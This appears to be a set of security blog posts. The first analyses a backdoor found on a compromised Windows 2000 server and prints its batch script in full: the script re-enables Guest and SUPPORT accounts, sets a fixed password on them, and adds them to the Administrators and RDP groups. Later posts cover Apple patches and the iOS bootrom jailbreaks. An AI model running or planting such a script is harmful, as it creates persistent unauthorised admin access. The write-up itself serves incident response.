I recently came across a Windows 2000 server that was found to have been compromised. During the investigation, both the Guest and Support_388945a0 accounts were found to had been placed in the Administrators and Remote Desktop Users groups (as the server was internet facing). Things got interesting however, when we removed these accounts from those groups and disabled them both. After logging back in a short while later, both Guest and Support accounts had been re-enabled and put back into the Admins and RDP groups.
When going to check the Windows hosts file to make sure there weren’t any modifications made to it, the following suspicious files were found in %systemroot%\system32\drivers\etc\
After some analysis, none of these files were found to be inherently malicious, but are instead used by a malicious batch script to enable the Guest and Support accounts with a specific password, and add them to the Admins and RDP group. The 1.exe file, for example, is just a executable with account-management capabilities.
In C:\WINDOWS\Application Compatibility Scripts\Install\Template there was a batch script called “.bat” with the following contents:
@1 localgroup “Remote Desktop Users” SUPPORT_388945a0 /add
@1 localgroup “Remote Desktop Users” guest /add
@1 user guest QQqqaa123321
@1 user guest QQqqaa123321 /add
@1 localgroup administrators guest /add
@1 user guest /active:yes
@1 user SUPPORT_388945a0 QQqqaa123321
@1 user SUPPORT_388945a0 QQqqaa123321 /add
@1 localgroup administrators SUPPORT_388945a0 /add
@1 user SUPPORT_388945a0 /active:yes
At this point it’s fairly evident what’s going on, this bat script is being run periodically, and runs 1.exe to ensure that both the Guest and Support_338945a0 accounts are present, and in the Administrators and Remote Desktop Users groups. It also sets the password to both of those accounts to ‘QQqqaa123321′. If you find these files on your system, consider that server compromised. Remove the files and disable those accounts in the first instance, but a full rebuild is highly recommended to rule out the possibility of other backdoors or rootkits.
These types of batch scripts are not uncommon for backdoor trojans. However, I couldn’t find any references to this particular backdoor, so thought I would post about this in case anyone else searches for information about it. Note that at the time of writing, this batch script is not picked up by any anti-virus software.
I wasn’t going to post about last week’s fairly significant iTunes update, but then Apple went and patched a whole bunch of vulnerabilities across the board. Some of these are fairly significant so I thought I would provide a short breakdown of the changes. Either way, you should definitely be patching all of your Apple devices and software tonight.
Hit the jump for a summary of the key vulnerabilities patched in Apple’s security updates.
This issue was a nice catch, discovered by Aaron Sigel who has a detailed explanation, video demo and proof-of-concept on his blog. It probably goes without saying, but Safari users should run Software Update as soon as possible.
The vulnerabilities include improper handling of JP2, AVI, MPEG, Flashpix, GIF, PICT, and QTVR files. Viewing maliciously-crafted files can lead to remote code execution in some cases.
QuickTime definitely needs more strengthening. Leopard and Windows users, go forth and patch!
Ever since the release of the IronKey I’ve been drooling over the device (good thing it’s waterproof I guess). Due to not wanting to pay so much for a USB key, I decided to make my own. I grabbed myself a 32GB USB key, and got to work on making it as close to the IronKey as possible.
Safari updates 5.0.3 and 4.1.3 (for both Mac OS X and Windows) have been released to patch a number of WebKit vulnerabilities, some of which can lead to arbitrary remote code execution.
Fire up your Software Update! Hit the jump for full details of the vulnerabilities fixed.
The chronic dev team (@chronicdevteam) have released greenpois0n, their iOS jailbreak tool featuring an implementation of geohot’s bootrom exploit. Downloads are available for Mac OS X, Windows and Linux. It also only works on iOS 4.1.
This release of greenpois0n supports:
- iPhone 4
- iPhone 3G S
- iPod touch (4th Generation)
- iPod touch (3rd Generation)
Soon there will be another release, adding things like support for:
- Apple TV (2nd Generation)
- iPod touch (2nd Generation)
[Updated 4/2/2011] greenpois0n updated to jailbreak iOS 4.2.1
geohot has released limera1n, the latest iOS jailbreak. After the success of comex’s Jailbreakme.com, which was patched by iOS 4.0.2, limera1n brings a theoretically unpatchable exploit thanks to an extremely low-level vulnerability that affects all of Apple’s iOS-base devices. Both Mac OS X and Windows versions of limera1n are now available for download.
The jailbreak uses an exploitable vulnerability in the iOS boot-rom. This is the reason it’s theoretically unpatchable, as the boot-rom is something that would need to be physically flashed on the affected devices. By ‘unpatchable’ I mean that Apple will not be able to patch the vulnerability that makes the jailbreak possible, on existing iOS devices. If this is indeed the case, then this would mean that the current line of iOS devices are guaranteed to be jailbreakable even when applying new iOS updates. Apple would have to patch the bug in the boot-rom in new devices they release down the line.
In other news, the jailbreaking scene has had its feathers ruffled as the chronic dev team were originally going to release their greenpois0n jailbreak (using their SHAtter exploit). Rumor has it they shared their exploit with geohot, who went ahead and published his own tool before they could. Fun times.
[Update] Although the boot-rom exploit might not be patchable, limera1n uses a userland exploit to perform the untethered jailbreak. This means that Apple could potentially patch the untethered part of the jailbreak – although the boot-rom exploit would still exist. For more info read Update #1 at the bottom of this post.
Many people seem to be wondering what is meant by limera1n being ‘unpatchable’. Hopefully this posts answers that question somewhat. If you’re still unsure, feel free to post a question in the comments.